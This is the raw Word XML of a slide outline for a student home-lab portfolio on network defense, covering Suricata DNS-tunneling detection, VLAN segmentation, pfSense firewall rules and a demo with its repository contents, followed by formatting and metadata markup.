      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t>pfSense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0DDE0BC1" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Visual Placeholder:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve"> Suricata alert screenshot + VLAN diagram screenshot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A75B49F" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Insight:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve"> Detecting covert data exfiltration attempts protects sensitive assets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309EF282" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key Defenses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCA2849" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D429F6">
        <w:t>Suricata DNS monitoring for long/high-volume queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52786829" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D429F6">
        <w:t>VLAN segmentation stops lateral movement and isolates attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7040DF75" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Call to Action:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve"> “Review DNS detection rules and VLAN configs in the repository.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C9814C" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:r w:rsidRPr="00D429F6">
        <w:pict w14:anchorId="29457B9C">
          <v:rect id="_x0000_i1169" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6471E266" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Slide 5 – Demo &amp; Portfolio Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00076030" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Title:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve"> Demo &amp; Deliverables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3601D1F4" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Demo Video:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve"> ≤30 seconds showing attacks and alerts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE0402D" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D429F6">
        <w:t>File: demo/demo_video.mp4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0AF136" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Repository Contents:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD48FFD" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D429F6">
        <w:t>Suricata configs &amp; rules (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t>suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t>suricata.yaml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t>local.rules</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A4C1FD" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t>pfSense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve"> firewall rules (firewall_rules.pdf)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B2E205" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve">PCAPs &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t>eve.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t>pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve">/, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t>eve.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D429F6">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7795D538" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D429F6">
        <w:t>Network topology diagram (network_topology.png)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A21CBC4" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D429F6">
        <w:t>Demo script (demo/network_demo.sh)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D92F2F3" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Visual Placeholder:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve"> Demo video thumbnail + terminal alerts screenshot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597F1876" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Insight:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve"> Portfolio demonstrates </w:t>
      </w:r>
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hands-on skills</w:t>
      </w:r>
      <w:r w:rsidRPr="00D429F6">
        <w:t xml:space="preserve"> in network defense, detection, and reporting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDA4BF1" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key Defenses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A05E08" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D429F6">
        <w:lastRenderedPageBreak/>
        <w:t>Firewall rules block port scans</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23440797" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D429F6">
        <w:t>IDS/IPS detects SYN floods and DNS tunneling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E3E58E" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D429F6">
        <w:t>VLAN isolation limits attacker access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EA3251" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D429F6">
        <w:t>Logging provides actionable alerts for investigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9938B0" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:r w:rsidRPr="00D429F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Call to Action:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30207F45" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D429F6">
        <w:t>“Explore the full lab and replicate the defense stack using the GitHub repository.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BF50E8" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D429F6">
        <w:t>“Connect with me for detailed walkthroughs or internship opportunities.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8FC220" w14:textId="77777777" w:rsidR="00D429F6" w:rsidRPr="00D429F6" w:rsidRDefault="00D429F6" w:rsidP="00D429F6">
      <w:r w:rsidRPr="00D429F6">
        <w:pict w14:anchorId="69A3E4B7">
          <v:rect id="_x0000_i1170" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="750C59DA" w14:textId="77777777" w:rsidR="00E146C0" w:rsidRDefault="00E146C0"/>
    <w:sectPr w:rsidR="00E1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861"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="840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0BB1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7E96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2964"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5766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E4997"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FA5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2853"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="64C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C7A4C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0B5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B5370"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="710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30773"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0ED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A5FC4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3F9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F5F96"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="831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10C34"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BBC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07"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="81E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01AAB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="862A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80CED"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2A0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D47AF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9B7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C0CDD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6E2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43264"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B2E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07ADE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D37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67749"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="03BE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521BD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="17D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A53B6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="70D0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E2DB7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="016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F7827"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9CA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21FC5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E2F8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5027D7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5E9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16054"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="89E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04D19"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D48C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4A687D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A35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87A49"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="37D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169FE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="127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063CD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D35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5319E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="53C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C13BB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4DE4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22461"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AE9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611E0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F78E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E356D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CA1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443240">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="229922770">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1146703107">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1337028480">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1138188836">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="346175354">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1590504440">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="2034844166">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="701512735">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="168327868">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1364358132">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="820387773">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="602303172">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="443312610">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="539510623">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="431169466">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="509025598">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1620259562">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1743721162">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="638146780">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1467359448">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="111436586">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1734738387">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="913011068">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="2079326870">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="681010756">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="1294100156">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="888613364">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="864900660">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="189150721">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="391271730">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="297691550">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="933054909">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="335157093">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="613439832">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="1120672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F6"/>
    <w:rsid w:val="001945D0"/>
    <w:rsid w:val="003A2319"/>
    <w:rsid w:val="00726251"/>
    <w:rsid w:val="00B2727C"/>
    <w:rsid w:val="00D429F6"/>
    <w:rsid w:val="00E1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B577"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{35A9E48D-F19B-435E-B167-D46F1563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Ekanem</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Helen Ekanem</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-09-10T22:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-10T22:41:00Z</dcterms:modified>
</cp:coreProperties>
</file>